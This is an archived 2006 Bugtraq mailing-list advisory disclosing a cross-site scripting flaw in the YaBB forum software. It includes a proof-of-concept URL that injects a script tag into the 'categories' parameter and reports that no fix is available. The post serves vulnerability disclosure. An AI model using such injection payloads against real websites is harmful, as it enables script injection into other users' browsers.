| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060810041334.28900.qmail@securityfocus.com>
Date: 10 Aug 2006 04:13:34 -0000
From: Outlaw@...a-security.net
To: bugtraq@...urityfocus.com
Subject: Yabb XSS
###########################################################################################
#Aria-Security.net Advisory #
#Discovered by: OUTLAW #
#< www.Aria-security.net > #
#Gr33t to: A.u.r.a & C0d3r & l2odon & R@...N @ DrtRp & #
###########################################################################################
#Software: YaBB
#Attack method: Cross Site Scripting
#
#
#Proof of Concept:
#
#index.php?action=faqmy&myfaq=yes&id_cat=1&categories=<script>alert("xss")</script>
#
#----------------------------------------------------------
#
#Solution
#
#No Solutions
#
#Contact : Outlaw@...a-security.net
#